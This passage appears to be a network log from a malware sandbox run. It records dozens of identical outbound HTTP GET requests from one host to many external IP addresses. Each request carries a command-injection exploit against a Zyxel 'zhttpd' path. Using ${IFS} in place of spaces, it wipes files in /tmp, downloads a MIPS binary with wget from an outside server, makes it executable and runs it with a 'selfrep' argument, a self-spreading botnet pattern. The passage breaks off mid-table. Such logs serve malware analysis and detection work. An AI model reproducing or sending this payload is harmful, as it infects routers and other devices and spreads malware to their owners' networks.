                                        Jan 14, 2024 16:18:45.473396063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4541192.168.2.1354592191.240.38.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473453999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4542192.168.2.1354878192.247.47.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473462105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4543192.168.2.135046213.2.249.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473481894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4544192.168.2.134580441.209.151.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473515034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4545192.168.2.1352412148.169.105.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473588943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4546192.168.2.134711064.244.113.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473623991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4547192.168.2.1334108136.54.127.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473686934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4548192.168.2.134500663.185.31.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473711014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4549192.168.2.1345084169.34.76.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473747969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4550192.168.2.134431413.27.200.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473762989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4551192.168.2.1334034175.197.110.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473829985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4552192.168.2.134474451.43.13.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473861933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4553192.168.2.133633237.16.101.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473923922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4554192.168.2.1344514174.71.151.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473937035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4555192.168.2.1335904189.83.216.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473970890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4556192.168.2.1353748135.31.231.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474020004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4557192.168.2.1336242204.117.83.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474066019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4558192.168.2.1360370216.32.204.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474116087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4559192.168.2.135522459.134.68.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474145889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4560192.168.2.135522836.119.53.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474180937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4561192.168.2.134423892.54.180.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474220991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4562192.168.2.135902812.203.140.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474277020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4563192.168.2.1353498145.129.6.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474311113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4564192.168.2.1357218100.130.132.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474374056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4565192.168.2.135217234.3.186.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474402905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4566192.168.2.133499824.105.9.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474455118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4567192.168.2.1355648192.165.240.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.474502087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4568192.168.2.1340934106.196.140.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478488922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4569192.168.2.134094648.163.227.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478527069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4570192.168.2.1345186193.215.205.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478557110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4571192.168.2.1342652167.116.20.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478602886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4572192.168.2.135990475.120.142.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478631973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4573192.168.2.133433845.59.223.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478686094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4574192.168.2.1337712197.216.82.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478719950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4575192.168.2.1346484165.220.58.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478770018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4576192.168.2.1338834105.134.224.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478823900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4577192.168.2.135238093.153.55.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478859901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4578192.168.2.1350854197.69.24.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478885889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4579192.168.2.1352040118.206.215.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.478956938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4580192.168.2.135237462.133.24.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479008913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4581192.168.2.133651698.1.147.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479034901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4582192.168.2.1360116115.110.101.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479070902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4583192.168.2.13524325.64.95.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479106903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4584192.168.2.1339202146.215.25.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479151964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4585192.168.2.1358184218.140.254.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479191065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4586192.168.2.1349632143.89.0.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479245901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4587192.168.2.136013466.102.233.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479289055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4588192.168.2.134061050.123.230.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479327917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4589192.168.2.1335248115.176.134.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479439020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4590192.168.2.134683624.138.188.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479439974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4591192.168.2.1360066200.235.139.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.479440928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4592192.168.2.1352420169.237.177.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495098114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4593192.168.2.1359308151.228.157.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495130062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4594192.168.2.134125070.70.126.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495201111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4595192.168.2.1354092162.65.154.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495229959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4596192.168.2.1345642222.251.184.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495255947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4597192.168.2.1347316108.12.58.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495297909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4598192.168.2.135297840.186.155.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495353937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4599192.168.2.1360216121.101.25.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495402098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4600192.168.2.134850279.144.178.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495444059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4601192.168.2.1344450216.71.238.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495479107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4602192.168.2.134760895.215.62.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.495534897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4603192.168.2.1343246129.87.115.158443
                                        TimestampBytes transferredDirectionData
